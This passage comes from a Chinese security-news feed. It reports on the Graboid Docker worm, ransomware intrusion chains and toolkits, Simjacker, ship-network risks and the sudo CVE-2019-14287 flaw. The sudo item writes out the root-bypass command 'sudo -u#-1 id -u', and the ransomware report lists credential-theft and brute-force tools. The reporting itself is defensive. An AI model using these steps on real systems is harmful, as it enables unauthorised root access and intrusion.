https://simjacker.com/downloads/technicalpapers/AdaptiveMobile_Security_Simjacker_Technical_Paper_v1.01.pdf

Adaptive Mobile Security 博客文章:

https://www.adaptivemobile.com/blog/simjacker-frequently-asked-questions

给 SIM 卡制造商的安全建议:

https://simalliance.org/wp-content/uploads/2019/08/Security-guidelines-for-S@T-Push-v1.p

9999.jpg

]]>
你的Docker容器可能充满了Graboid加密蠕虫 Wed, 23 Oct 2019 22:13:00 +0800 Docker成为了加密劫持蠕虫Graboid目标,该蠕虫是刚刚被发现并命名的。

根据Unit 42的研究人员称,该蠕虫旨在挖掘Monero加密货币,到目前为止,已经感染了2,000多台不安全的Docker引擎(社区版)主机,这些主机正在清理中。

根据Unit 42的数据,最初的恶意Docker镜像已被下载了10,000次以上,蠕虫自身已被下载了6,500多次。管理员可以通过镜像创建历史记录,查找名为“ gakeaws / nginx”的镜像来发现感染。

攻击者通过不安全的Docker daemons获得了最初的立足点,该daemons首先安装了Docker镜像以在受感染的主机上运行。另外,攻击者无需任何身份验证或授权,即可完全控制Docker 引擎和主机。攻击者利用此入口点来部署和传播蠕虫。

一旦恶意Docker容器启动并运行,它将从15个C2服务器中的一个下载四个不同的脚本以及易受感染的主机列表。然后,它随机选择三个目标,将蠕虫安装在第一个目标上,在第二个受感染主机上停止安装挖矿,并在第三个也已被感染的目标上启动挖矿。

研究人员解释说:“这一程序导致了非常随机的挖矿行为。” “如果我的主机受到威胁,则恶意容器不会立即启动。取而代之的是,我必须等到另一位受到感染的主机选择我并开始我的挖掘过程。其他受到感染的主机也可以随机停止我的挖掘过程。本质上,每台受感染主机上的挖矿均由所有其他受感染主机随机控制。这种随机设计的动机尚不清楚。”

以下是更详细的分步操作:

1. 攻击者选择了一个不安全的Docker主机作为目标,并发送远程命令来下载和部署恶意Docker镜像pocosow / centos:7.6.1810。该镜像包含用于与其他Docker主机进行通信的Docker 客户端工具。

2. pocosow / centos容器中的入口点脚本/ var / sbin / bash从C2下载4个shell脚本,并一一执行。下载的脚本为live.sh,worm.sh,cleanxmr.sh和xmr.sh。

3. live.sh将受感染主机上的可用CPU数量发送到C2。

4. worm.sh下载文件“ IP”,其中包含2000多个IP的列表。这些IP是具有不安全docker API端点的主机。worm.sh随机选择一个IP作为目标,并使用docker客户端工具远程拉动和部署pocosow / centos容器。

5. cleanxmr.sh从IP文件中随机选择一个易受攻击的主机,然后停止目标上的cryptojacking容器。cleanxmr.sh不仅会停止蠕虫部署的密码劫持容器(gakeaws / nginx),而且还会停止其他基于xmrig的容器(如果它们正在运行)。

6. xmr.sh从IP文件中随机选择一个易受攻击的主机,然后在目标主机上部署镜像gakeaws / nginx。gakeaws / nginx包含伪装成nginx的xmrig二进制文件。

在每个受感染的主机上定期重复执行步骤1至步骤6。上一次已知的刷新间隔设置为100秒。启动pocosow / centos容器后,刷新间隔,shell脚本和IP文件都从C2下载。

在使用2000个潜在受害者池中的蠕虫进行模拟时,研究人员发现,蠕虫可以在一个小时内传播到1400个易受攻击主机中的70%。此外,每个矿工有63%的时间处于活动状态,每个挖矿期持续250秒;因此,在模拟中,在受攻击的1400个主机群集中,平均有900个矿工始终保持活跃。

虽然这种加密劫持蠕虫不涉及复杂的策略,技术或过程,但该蠕虫可以定期从C2提取新脚本,因此它可以轻松地将其自身重新用于勒索软件或任何恶意软件,以完全破坏主机,所以这不应被忽略。如果创建了一种更强大的蠕虫来采用类似的渗透方法,则可能造成更大的破坏,因此使用者必须保护其Docker主机。

以下是使用者可以防止受到攻击的措施:

1. 如果没有适当的身份验证机制,切勿将docker daemons暴露在互联网。请注意,默认情况下,Docker Engine不会暴露于互联网。

2. 使用Unix套接字在本地与Docker daemons进行通信,或者使用SSH连接到远程Docker daemons。

3. 切勿从未知注册表或未知用户名称空间中提取Docker镜像。

4. 经常检查系统中是否有未知的容器或镜像。

相关IOC:

Docker镜像:

pocosow / centos:7.6.1810:

sha256:6560ddfd4b9af2c87b48ad98d93c56fbf1d7c507763e99b3d25a4d998c3f77cf

gakeaws / nginx:8.9:

sha256:4827767b9383215053abe6688e82981b5fbeba5d9d40070876eb7948fb73dedb

gakeaws / mysql:

sha256:15319b6ca1840ec2aa69ea4f41d89cdf086029e3bcab15deaaf7a85854774881

C2 服务器:

120.27.32[.]15

103.248.164[.]38

101.161.223[.]254

61.18.240[.]160

182.16.102[.]97

47.111.96[.]197

106.53.85[.]204

116.62.48[.]5

114.67.68[.]52

118.24.222[.]18

106.13.127[.]6

129.211.98[.]236

101.37.245[.]200

106.75.96[.]126

47.107.191[.]137

9999.jpg

]]>
防止数据泄露的4种优秀员工工作实践 Wed, 23 Oct 2019 22:13:00 +0800 对于这个互联世界中的每个企业来说,比较大的挑战也许就是数据保护。我们已经看到破坏性的直接财务损失数据泄露给碰巧要处理的每个业务实体带来;孟加拉银行Yahoo! 邮件,以及Facebook的数据泄露,只是过去几年中我们可以举出的数据泄露中的一小部分。

因此,许多国家/地区都在优化其影响每个实体的数据安全法律,甚至是将业务流程外包给会计公司,律师事务所和PE的实体。

实际上,欧盟是率先为其公民实施更高数据安全措施的国家之一,被称为GDPR,通用数据保护法规。

尽管在信息安全中应用了许多对策,但众所周知,许多主要的安全威胁来自组织内部的人员,主要是通过Machiavellian网络黑客采用的精心社交工程来完成的。

eBay 于2014年5月非常认真地吸取了这一教训,当时黑客使用其公司员工的凭据进入了公司网络,在经过彻底调查后,该公司内部访问已超过半年!当然,这损害了他们的用户数据,他们全部1.45亿(可能更多)。

这就是为什么组织中的每个人都必须了解优秀的工作场所实践以强有力地实施它们的重要性。本文将引导您了解工作场所数据安全性实践的基础,以开始使用。

保密和保密协议

对于要实现的每个协议或政策,都必须简化为书面形式。此外,必须确保所有有权访问敏感信息的专业人员或管理员都必须签署所有机密性协议。这意味着所有员工,合作伙伴和供应商在开始项目之前必须签署保密和保密协议。

唯一的ID和登录系统

公司必须具有受密码保护的系统,以防止对机密信息的未经授权的访问,这是一个标准。此外,期望每个员工都有自己的唯一ID和密码以用于登录。

与此相关,必须根据员工的角色和职能,应用访问管理协议来限制对机密和个人信息的访问;仅在他们成功履行职责所需的范围内给予他们访问权限。

做好基础网络安全防护

做好基础安全防护,例如企业网站部署SSL安全证书,企业邮件部署邮件证书等等,做好最基础的安全防护工作,避免因小失大。

HTTP基数很大,漏洞百出,在流量劫持者眼中,是很好的下手目标。利用明文传输自身的缺陷,网络黑客们不费吹灰之力,就可以对信息内容进行窃听、篡改和劫持。企业网站部署基本的SSL证书是为了保护数据在网络中传输过程不受到黑客的窃取甚至篡改。

邮件证书对电子邮件进行数字签名并加密传输,一方面可以保证邮件发送者身份真实性,另一方面保障了邮件传输过程中不被他人阅读及篡改,并由邮件接收者进行验证,确保电子邮件内容的完整性。

数据安全性,隐私和机密性培训

除了建立全面的信息和安全程序外,提供定期的网络安全培训和意识更新还可以帮助您的团队填补纸上文字与现实生活中数据泄露的发生方式之间的空白。

多年来,数据泄露的很大一部分是由恶意软件和网络钓鱼软件通过单击链接或打开通过无害电子邮件发送的附件进入网络而造成的。如果仅对员工进行数据安全培训,则可以很容易地防止这些数据泄露。

此外,未经培训的员工通常是网络犯罪分子为获取公司网络访问权而进行的猎物。

领导团队和所有高管也应接受深入的正式数据安全培训。这将确保组织中的每个人,包括管理层,都了解数据安全性的价值。

结论

尽管信任您的员工能够诚信地完成工作是社会契约的一部分,但是对于公司而言,仍然必须自觉地保护组织中任何有权访问客户/客户数据的人。应用这些工作场所实践将有助于您的公司防止数据泄露并保护机密信息。

9999.jpg

]]>
注意:你的网络安全吗? Wed, 23 Oct 2019 22:13:00 +0800 根据网络信息中心(CNNIC)28日发布的数据显示,截至2018年底,中国网民数已经达到8.29亿,可见规模之大。所以国家大力宣传网络安全,因为现在几乎每个人日常生活已经离不开网络,今天就简单谈谈网络安全。

1.为什么要有“墙”

一句话总结,为了国家安全。看着这句话似乎很牵强,要是有一些稍微深入了解,就会认为这句话是有道理。如前几年斯诺登事件,通过斯诺登的泄露,很多人惊讶的发现好多欧洲国家都在美国的监控之中。这就是美国的可怕,通过网络渗透到欧洲国家。

虽然谷歌、facebook等对外宣称自己是单纯的科技公司,不会牵扯到政治,去年还是报道出,美国政府利用facebook收集资料。网友常常对“墙”忿忿不平,其实国家在保护人民信息泄露。

在谈谈谷歌这个公司,可能很多人只知道谷歌是搞搜索的科技公司,有个安卓操作系统。国家为什么要禁止大部分进入中国(并没有全面禁止,如谷歌学术、谷歌翻译还是可以用的),还是前面说的那一点,谷歌首先是个美国公司,使用美国的服务是可怕的。谷歌有强大的数据存储能力,当使用谷歌的时候,它在无形中收集个人信息。

2.网络安全离我们多远

小到社交聊天,大到银行转账,网络的使用渗透到日常生活的方方面面。既然使用网络,就应该考虑网络安全的事宜。

目前网络环境会使用各种账号,这就可能出现账号密码泄露的问题。调研公司SplashData,每年他们分析了互联网上泄露的500多万个密码选出最糟糕的25个,发现人们仍然在使用容易猜到的密码。其中123456,Password,12345678, qwerty,12345这几个密码常年在前几位,可见多数人仍然仍然没有较强的安全意识。

虽然目前网站密码在存储的时候就已经经过加密,如果只使用8个或者更短,这些字符又仅限于字母数字,那么密码仍然可以在几分钟内就能被破解。建议在日常生活中使用至少10-12个字母的密码,或者是使用包括大小写字母、数字混合的密码。此外,在登录不同的网站时,建议使用不同的密码(由于现在各种账号密码众多,这个似乎不好实现)。

在日常使用网络时会发现,一旦自己进行过特定商品或者关键词语的检索,该网站的推送即会一直围绕该关键词语展开。用户即使搜索自己一个月前的检索内容,也往往一目了然。此举本是为用户提供方便,但难免会被一些人利用,这在无形中已经涉及到个人的网络信息安全。

例如随意在公用电脑上自动登录自己的邮箱、微信等,不定期对自己的网络痕迹进行清理等,都会导致自己的信息存在暴露的风险。对于自己网络浏览痕迹以及电脑内部的及时清理,对维护网络安全以及自身的财产安全十分必要。

3.如何保证个人信息不被泄露

日常生活中常常会接到骚扰电话,这就说明你的信息已经通过网络或者其他途径被泄露了,在日常接触网络中,以下三个方面需要注意防范。

(1)不要随意晒照

通过微博、QQ空间、贴吧等和熟人互动时,有时会不自觉说出或标注对方姓名、职务、工作单位等真实信息。有些家长在朋友圈晒的孩子照片包含孩子姓名、就读学校、所住小区,这就泄露了;晒火车票、登机牌、姓名、身份证号、二维码等包含重要信息的号码一定要模糊处理。

如前一段时间有个人在网上晒自己的点菜二维码,结果他那桌被点了数万元的菜,还有网上买电影票发朋友圈,被别人取票的。重要的号码,如果不处理,势必会被一些人利用。

(2)不要随意点击别人分享的不明链接

微信上或者其他平台总是碰到各种填写调查问卷、玩测试小游戏、购物抽奖,或申请免费邮寄资料、申请会员卡等活动,一般要求填写详细联系方式和家庭住址等个人信息。此时一定要慎重,天下没有免费的午餐。

(3)慎用公共场所免费WiFi

如今你踏入任何一家商场或是饭店,拿起手机都可以免费链接WiFi,可是在你享受公共WiFi的便利时,你的个人信息可能会被泄露。虽然现在支付宝微信支付已经有足够的安全保护措辞,能保证你的电子账户里面的钱。但仍然会泄露你的手机号等个人信息。如今年315报道的探针,在连接无线的时候,那种设备已经可以探测到你的手机号,过一段就会有人给你打骚扰电话。

(4)不要使用未知的APP

这个确实现在苹果ios系统做的比较好,由于苹果手机的审核机制,恶意APP根本无法上线。而安卓手机由于没有统一的标准,各种应用商店提供的APP参差不齐,难免有些会是恶意软件。

移动互联网恶意程序一般存在以下一种或多种恶意行为,包括恶意扣费、信息窃取、远程控制、恶意传播、资费消耗、系统破坏、诱骗欺诈和流氓行为。这些恶意软件会获取你的手机很多权限,例如收集的你手机号,转手卖出去。也是接到骚扰电话的原因之一。

网络安全现在国家已经高度重视,已经于2016年颁布《中华人民共和国网络安全法》,并且每年都要举办网络安全宣传周。但说再多,还需要个人有较强的网络安全防范意识。

9999.jpg

]]>
赛门铁克反病毒软件更新导致Windows蓝屏死机 Wed, 23 Oct 2019 22:13:00 +0800 近日,赛门铁克对旗下 Endpoint Protection 产品进行了更新,结果导致了一波用户投诉。原因是该版本会导致 Windows 系统遭遇致命的蓝屏死机和无限重启问题。这件事情的罪魁祸首,需要追溯到 10 月 14 日发布的软件更新。许多网友都在 Reddit 上吐槽了此事,后官方终于承认了这个 bug 。

Symantec Bug.jpg

(题图 via Softpedia

截至目前,似乎所有 Windows 版本都受到了这一 bug 的影响,包括客户端和服务器操作系统。

若不慎更新了存在 bug 的升级版本,那 Windows 7 / 8.1 / 10 操作系统都会遭遇蓝屏死机。

赛门铁克解释称:“在 SEP 安全软件上运行 LiveUpdate 之后,计算机可能出现崩溃,调查发现是 IDSvix86.sys / IDSvia64.sys 这两个文件出现了问题”。

该公司补充道:问题在于 LiveUpdate 模块下载了 Intrusion Prevention 2019/10/14 r61 。

而蓝屏死机的用户,则会见到 BAD_POOL_CALLER(c2)或 KERNEL_MODE_HEAP_CORRUPTION(13A)这两种错误代码。

image.png

(截图 via Reddit)

庆幸的是,赛门铁克已经及时地通过更新修复,并建议客户安装最新的定义库来修复 bug 。尽管在某些情况下,许多人的计算机已经崩溃得难以执行这样的操作。

若真如此,这部分客户可以手动执行更新。或重启系统后先进入安全模式,然后删除错误的定义库。

该公司称:请运行 LiveUpdate 以下载由 Intrusion Prevention 签名的 2019/10/14 r62 版定义库,或回滚到先前已知的正常版本,以免遭遇蓝屏死机。

image.png

(躺枪者众)

目前尚不清楚有多少设备受到 2019/10/14 r61 问题的影响。但据 Reddit 用户报告,即便更新至 2019/10/14 r62,许多系统仍然会遭遇蓝屏死机。

某负责管理服务器的 Reddit 用户称:我们也遇到了同样的问题。每隔 20 分钟,就有至少 50 台服务器发生了随机重启。

受影响的系统综述超过 10000 个,没办法只能召唤 Tier 1 / Tier 2 支持团队来帮忙了。

综上所述,如果您的系统不得不安装赛门铁克 SEP 软件,还请临时将它替换成其它不受影响的版本。

9999.jpg

]]>
“神秘盒子”或威胁全球运输船 Wed, 23 Oct 2019 22:13:00 +0800 22.jpg

未知的、存在漏洞的系统几乎存在于研究人员测试的每一艘船中。

近期,有安全研究人员表示,商业运输船的内部环境充满了漏洞——甚至还包括无人知晓是什么、更没进行过安全修复的的“神秘盒子”。

Pen Test Partners的研究员Andrew Tierney于近期在博客中写道:“在迄今为止的每一次对航海船的测试中,我们都发现了某个系统或设备,只有少数船员知道它的存在,而且还没人能告诉我们这是干什么用的”。在一般的网络环境中,一个未知的系统或设备都会被视为“恶意植入”。但在海上网络环境中,这却是一件很普遍的事。

在某个案例中,船上一个目的不明的监控系统被发现,它居然还与主引擎相连。船队管理层没有该设备的购买或安装的记录;硬件上更没有标记。Tierney表示,这个设备貌似是第三方合作伙伴安装的,而几年前船队就已经和这个第三方终止了合作。

除了连接到主引擎外,它还通过网络连接到舰桥上的一个控制台——船员们对它置之不理,因为他们平时并不会使用它。

Tierney在注意到这个“可疑”的盒子后并开始仔细调查,结果发现这个盒子使用通用的集成电路和船舶的标准通信协议NMEA 0183来收集传感器数据。数据被收集后会通过UDP协议进行传播,而传输消息的开头是$IN,这和NMEA的数据非常相似。

具体来说,就是研究人员发现一个无记号的Moxa RS232串口转换器连接到这个可疑的盒子,再通过线缆连接到一个房间大小的MAN B&W 10G90ME主引擎(通过PLC的辅助串行进行连接)。这个引擎被安置在可疑盒子下方11层的甲板上——NMEA 0183数据就是从这里发过来的。

33.jpg

总而言之,研究人员发现了一台Windows电脑远程连接到主引擎的控制端,但在这之前没人知道。而更夸张的是,这台Windows机器上运行着TeamViewer,这个未知设备也很久没有打安全补丁了。研究人员还补充道:“我们在过去已经证明,通过操控类似的关键系统,可以让整个舰队的船只停止航行。”

44.png

研究人员尚无法确定向可疑盒子发送恶意指令是否会对船舶引擎产生不利影响。但Tierney指出,这个可疑盒子就是航海网络漏洞百出的一个代表。

他解释到:“可能是为了有效管理船只,很多不同的系统会收集船只数据,然后汇总发送到岸上。而为了收集详细的船只数据,监控系统就必须和高风险系统:ECDIS、ICMS、主机、燃油系统……相连。”

而很多船只管理人员为了省事,并不会请工程师来安装系统,他们仅仅只是想尽快让监控设备运行起来,而不管它是否安全。

他表示,在监控系统启动和运行的过程中,人们会习惯走捷径,比如使用以太网和SMB文件共享来发送和接收数据——没有防火墙或其他安全措施。

Pen Test Partners再过去已经证明,全球的航运业都很容易受到一系列网络攻击,这些攻击的发起难度相当低,同时也很容易防御。Pen Test Partners之前曾发布过几次PoC演示,展现了多种干扰导航系统的手段。这可以让船只偏离航线或撞击其他船只。

这个可疑盒子只是安全问题的一个缩影,本质上是由于船只内部系统太过复杂而引起的,这就导致即使是同一个造船厂所生产的同一型号的船只,所暗藏的危险性也大不一样(因为会受到大量第三方设备的干扰)。

9999.jpg

]]>
全套黑客工具横行内网,新型勒索病毒DEADMIN LOCKER盯上国内企业 Wed, 23 Oct 2019 22:13:00 +0800 近日,深信服安全团队捕获到针对国内企业的新型勒索病毒攻击事件,攻击者通过爆破获得跳板机权限后,利用全套黑客工具包对内网主机进行渗透,人工投放勒索病毒进行加密,该勒索病毒加密邮箱与后缀为硬编码的字符串“.[DeAdmin@cock.li].DEADMIN”,并在勒索信息文件中自命名为DEADMIN LOCKER,该勒索暂无公开解密工具。

a.jpg

加密完成后在桌面及加密根目录释放勒索信息文件

病毒名称:DEADMIN LOCKER

病毒性质:勒索病毒

影响范围:目前国内已有感染案例

危害等级:高危

传播方式:通过社会工程、RDP暴力破解入侵,并使用黑客工具包内网渗透

病毒描述

该勒索病毒主要利用全套黑客工具包对内网主机进行渗透,人工投放勒索病毒进行加密。在被勒索的主机上获取到攻击者留下的全套黑客工具包,包含从密码收集到远程登录等一系列内网渗透工具,可谓是一应俱全,其中包含较为小众的AutoMIMI、Lazy、rdp_con、gmer等工具,甚至包含名为!RDP的快捷方式,用于启动本地远程桌面连接:

b.jpg

黑客工具包包含:

密码抓取:AutoMIMI、mimi、netpass64.exe、Lazy

内网扫描:masscan、!PortScan、Advanced_Port_Scanner、NetworkShare

密码爆破: NLBrute

远程工具:psexec、!RDP、rdp_con

反杀软工具:gmer、PCHunter64、PowerTool、PowerTool_64、ProcessHacker64

勒索病毒入侵攻击流程:

1本地提权后,使用mimikatz抓取主机密码,在此过程中,黑客写了自动化脚本launch.vbs来简化抓取密码的步骤。

c.jpg

2黑客将抓取到的密码加入后续的爆破字典中,原因是管理员一般会将多个服务器的密码设置成相同的,将本机密码加入字典,可以增大爆破的成功率。

d.jpg

3使用端口扫描器扫描内网中存活的IP,并筛选开放了445和3389端口的主机。

e.jpg

4对于开放了3389端口的主机,黑客直接使用NLBrute进行爆破用户名和密码。

f.jpg

5对于只开放了445端口的主机,黑客通过爆破的方式获取主机的账号密码。

g.jpg

6然后使用psexec上传脚本至目标主机并运行,开启RDP服务。

h.jpg

7获取到以上爆破成功的主机后,使用rdp_con工具进行批量连接。

i.jpg

RDP连接到受害主机后,黑客会上传一系列反杀软工具,kill杀毒软件,最后运行勒索病毒进行勒索,至此,整个勒索入侵的流程完成。

勒索病毒详细分析

1勒索病毒文件使用UPX加壳,运行后首先调用了Winexec执行命令行删除磁盘卷影,用于防止用户恢复数据:

j.jpg

2关闭如下服务,避免影响加密:

vmickvpexchange、vmicguestinterface、vmicshutdown、vmicheartbeat、vmicrdv、storflt、vmictimesync、vmicvss、MSSQLFDLauncher、MSSQLSERVER、SQLSERVERAGENT、SQLBrowser、SQLTELEMETRY、MsDtsServer130、SSISTELEMETRY130、SQLWriter、MSSQL、SQLAgent、MSSQLServerADHelper100、MSSQLServerOLAPService、MsDtsServer100、ReportServer、TMBMServer、postgresql-x64-9.4、UniFi、vmms、sql-x64-9.4、UniFi、vmms

3遍历进程,结束下列进程,防止进程占用文件影响加密:

sqlbrowser.exe、sqlwriter.exe、sqlservr.exe、msmdsrv.exe、MsDtsSrvr.exe、sqlceip.exe、fdlauncher.exe、Ssms.exe、sqlserv.exe、oracle.exe、ntdbsmgr.exe、ReportingServecesService.exe、fdhost.exe、SQLAGENT.exe、ReportingServicesService.exe、msftesql.exe、pg_ctl.exe、postgres.exe、UniFi.exe、sqlagent.exe、ocssd.exe、dbsnmp.exe、synctime.exe、mydesctopservice.exe、ocautoupds.exe、agntsvc.exe、agntsvc.exe、agntsvc.exe、encsvc.exe、firefoxconfig.exe、tbirdconfig.exe、ocomm.exe、mysqld.exe、mysqld-nt.exe、mysqld-opt.exe、dbeng50.exe、sqbcoreservice.exe、excel.exe、infopath.exe、msaccess.exe、mspub.exe、onenote.exe、outlook.exe、powerpnt.exe、steam.exe、thebat.exe、thebat64.exe、thunderbird.exe、visio.exe、winword.exe、wordpad.exe、erbird.exe、visio.exe、winword.exe、wordpad.exe

4生成秘钥,使用RSA算法加密AES秘钥,再使用AES算法加密文件:

k.jpg

5在桌面创建一个勒索信息TXT文件,然后通过遍历在每个加密文件的根目录下释放一个勒索信息TXT文件:

l.jpg

6遍历磁盘进行加密,并且对C盘下的目录单独进行判断,跳过系统目录:

m.jpg

7加密完成后进行自删除:

n.jpg

解决方案

针对已经出现勒索现象的用户,由于暂时没有解密工具,建议尽快对感染主机进行断网隔离。此外,小编提醒广大用户尽快做好病毒检测与防御措施,防范该病毒家族的勒索攻击。

1病毒检测查杀:

(1)深信服终端检测响应平台(EDR)、下一代防火墙及安全感知平台等安全产品均具备病毒检测能力,部署相关产品用户可进行病毒检测。

(2)深信服为广大用户免费提供查杀工具,可下载如下工具,进行检测查杀。

64位系统下载链接:

http://edr.sangfor.com.cn/tool/SfabAntiBot_X64.7z

32位系统下载链接:

http://edr.sangfor.com.cn/tool/SfabAntiBot_X86.7z

2日常防御措施

(1)及时给电脑打补丁,修复漏洞;

(2)对重要的数据文件定期进行非本地备份;

(3)不要点击来源不明的邮件附件,不从不明网站下载软件;

(4)尽量关闭不必要的文件共享权限;

(5)更改账户密码,设置强密码,避免使用统一的密码,因为统一的密码会导致一台被攻破,多台遭殃;

(6)如果业务上无需使用RDP的,建议关闭RDP;

9999.jpg

]]>
新型Masked勒索病毒袭击工控行业 Wed, 23 Oct 2019 22:13:00 +0800 10月9号总部设在荷兰海牙的欧洲刑警组织与国际刑警组织共同发布报告《2019互联网有组织犯罪威胁评估》,报告指出数据已成为网络犯罪分子的主机攻击目标,勒索软件仍是网络安全最大威胁,全球各界需要加强合作,联合打击网络犯罪。

尽管全球勒索病毒的总量有所下降,但是有组织有目的针对企业的勒索病毒攻击确实越来越多,给全球造成了巨大的经济损失,勒索软件仍然是网络安全最大的威胁,成为作案范围最广、造成经济损失最严重的网络犯罪形式。

朋友发来一个消息,问我中了哪个家族的勒索病毒,如下所示:

随后朋友发来了勒索的相关信息和病毒样本,此勒索病毒运行之后会修改桌面背景,如下所示:

在每个加密的文件目录下,会生成两个超文件HTML的勒索提示文件,如下所示:

超文本文件HTML的内容,如下所示:

使用TOR打开勒索病毒解密网站,如下所示:

上面显示了RUSH GANG 1.3,要解密文件,只能通过邮件联系黑客,黑客的邮件联系方式:

backupyourfiles@420blaze.it

该勒索病毒使用了反调试的方法,阻止安全分析人员对样本进行调试分析,如下所示:

设置自启动注册表项

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run,如下所示:

遍历主机磁盘,如下所示:

生成勒索提示超文件HTML文件,如下所示:

将解密出来的勒索提示信息写入到HTML文件中,如下所示:

然后遍历磁盘文件进行加密,加密后的文件后缀为masked,如下所示:

此前已经有好几位工控安全的朋友前来咨询我,勒索病毒针对工控行业的攻击似乎也越来越多了,各位工控企业一定要做好勒索病毒的防范措施,以防被勒索病毒勒索加密,千万不能掉以轻心,黑客无时无刻不在寻找着新的攻击目标。

9999.jpg

]]>
29个国家使用的SIM卡容易受到Simjacker攻击 Wed, 23 Oct 2019 22:13:00 +0800

在此之前,我们曾分析过SIM卡中的一个安全漏洞,这个漏洞名叫Simjacker,而就在最近,Adaptive Mobile的研究人员(SimJacker的发现者)对外公布了一份地区名单,这份名单中所有国家的移动运营商所使用的SIM卡均会受到SimJacker攻击的影响。

参考资料

1、《国家级网军利用SIM卡漏洞,针对特定目标进行间谍活动

2、《SIM卡暗藏危险,被黑客利用操纵手机,全球10亿人可能中招

其实早在一个月前,Adaptive Mobile的研究人员就披露了SIM卡中的一个名为SimJacker的高危漏洞,远程攻击者可以利用该漏洞攻击目标用户的手机,并通过发送短信来对目标用户实施监控。

SimJacker漏洞存在于S@T浏览器动态SIM工具包中,该工具包嵌入在了很多国家移动运营商所使用的绝大多数SIM卡中。研究人员还发现,该漏洞的利用情况与目标用户所使用的手机型号没有必然关联。

现在,Adaptive Mobile的研究人员公布了一份受SimJacker漏洞影响的国家名单,而这些国家的移动运营商所使用的大多数SIM卡都无法抵御SimJacker攻击。不过,Adaptive Mobile的研究人员并没有在名单中指明受影响的移动运营商。

Adaptive Mobile的研究人员在报告中提到:“具体的受影响情况因国家和地区而异,根据我们的分析,我们在29个使用了这项技术的国家中总共识别出了61家受SimJacker攻击影响的移动运营商(不包括MVNOs)。根据公开报告的信息,这些使用了S@T浏览器的运营商累计用户数量大约有8.61亿(个移动连接SIM卡)。不过值得注意的是,并不是所有运营商的SIM卡都支持这项技术。”

下面是研究人员给出的受SimJacker漏洞影响的完整国家名单

中美洲:

墨西哥

危地马拉

伯利兹

多米尼加共和国

萨尔瓦多

洪都拉斯

巴拿马

尼加拉瓜

哥斯达黎加

南美洲:

巴西

秘鲁

哥伦比亚

厄瓜多尔

智利

阿根廷

乌拉圭

巴拉圭

非洲:

象牙海岸

加纳

贝宁

尼日利亚

喀麦隆

欧洲:

意大利

保加利亚

塞浦路斯

亚洲:

沙特***

伊拉克

黎巴嫩

巴勒斯坦

下图显示的是易受SimJacker攻击的国家和运营商数量:

S@T浏览器应用程序安装在了多种SIM卡中,其中也包括eSIM卡,S@T作为SIM工具套件(STK)的其中一个组件,它能够帮助SIM卡启动各种适用于增值服务的操作。因为S@T浏览器实现了一系列STK指令,其中包括短信发送、电话呼叫、浏览网页、提供本地数据、运行命令和发送数据等等,这些指令可以通过向手机发送SMS短信来执行。

攻击者可以利用SimJacker漏洞实现以下任务:

1、检索目标设备的位置和IMEI信息;

2、通过代表受害者发送假信息来传播错误信息;

3、通过拨打保险费率号码进行保险费率欺诈;

4、通过命令设备拨打攻击者的电话号码来监控受害者的周围环境;

5、通过强迫受害者的手机浏览器打开恶意网页来传播恶意软件;

6、通过禁用SIM卡来执行拒绝服务攻击;

7、检索其他信息,如语言、无线电类型、电池电量等;

下图显示的是SimJacker攻击的攻击流程:

在攻击期间,用户完全没有意识到他们受到了攻击,信息被泄露。由于它并非依存手机系统,而是内置于 SIM 卡,因此 iPhone、华为、三星等品牌手机、以及带有 SIM 卡的互联网装置,都有机会被攻击,而且被入侵之后,不会留下任何痕迹。

在将来,SIMjacker攻击很可能被利用成为一种诈骗手段。

SIM卡联盟已发布安全指南

S@T浏览器的开发商也就是SIM卡联盟,这家英国公司为全球运营商提供服务并负责制造各式各样的SIM手机卡。

而S@T浏览器自2009年发布更新后到现在10年都没有更新,长期没有更新不可避免地导致产生高危安全漏洞。

目前SIM卡联盟已经向全球运营商发布新的安全指南,要求运营商配置过滤措施拦截那些非法二进制的短信内容。

剩下的工作就要交给运营商了,运营商需要更新配置后直接通过云端向用户提供更新以便能够彻底封堵安全漏洞。

9999.jpg

]]>
Linux Sudo被曝漏洞,可导致用户以root权限运行命令 Wed, 23 Oct 2019 22:13:00 +0800

Linux 用户要注意了!几乎所有基于 UNIX 和 Linux 的操作系统上安装的核心命令,也是最重要、最强大也最常用的工具 Sudo中被曝存在一个漏洞。

Sudo 的全称是“superuserdo”,它是Linux系统管理指令,允许用户在不需要切换环境的前提下以其它用户的权限运行应用程序或命令,通常是以 root 用户身份运行命令,以减少 root 用户的登录和管理时间,同时提高安全性。该漏洞是 sudo安全策略绕过问题,可导致恶意用户或程序在目标 Linux 系统上以 root 身份执行任意命令,即使 “sudoers configuration” 明确禁止该 root访问权限也不例外。

漏洞详情

这个漏洞的 CVE 编号是CVE-2019-14287,是由苹果信息安全部门的研究员 Joe Vennix 发现并分析的。与其说让人恐慌,不如说让人兴趣盎然:它要求系统具有非标准配置。换句话说,在默认情况下,Linux 计算机并不易受攻击。然而,如果你的配置是这样的:让用户以 root 权限以外的其他用户权限运行命令,那么可能就需要注意了:因为用户可以通过命令行上的 –u#-1 绕过这个非 root限制。如果将 sudo配置为允许用户通过Runas 规范中的 ALL 关键字以任意用户身份运行命令,则可以通过指定用户 ID为-1 或4294967295 以 root 用户身份运行命令。只要Runas 规范中最先列出 ALL 关键字,即使Runas 规范明确禁止 root访问权限,那么具有足够的 sudo 权限的而用户即可以 root 身份运行命令。以这种方式运行的命令的日志条目会把目标用户列为 4294967295而非 root。另外,将不会为该命令运行 PAM 会话模块。具体而言:利用该漏洞要求用户具有 sudo 权限,从而以任意用户 ID 运行命令。一般而言,这意味着用户的 sudoers 条目在 Runas 规范中具有特殊值 ALL。Sudo 支持在 sudoers 策略允许的情况下,以用户指定的名称或用户 ID 运行命令。例如,如下 sudoers 条目允许 id 命令以任意用户身份运行,因为它包含 Runas 规范中的关键字 ALL。

myhost alice = (ALL) /usr/bin/id

用户不仅能够以其它合法用户身份运行该 id 命令,还能使用 #uid 语法以任意用户 ID 运行该命令,例如:

sudo -u#1234 id -u

将返回1234,然而,sudo 在运行命令前用户修改用户 ID 的setresuid(2) 和 setreuid(2) 系统调用将特殊对待用户 ID为-1(或其未签名的等同值 4294967295)而且并不会修改该值的用户 ID。因此,

sudo -u#-1 id -u

 sudo -u#4294967295 id -u

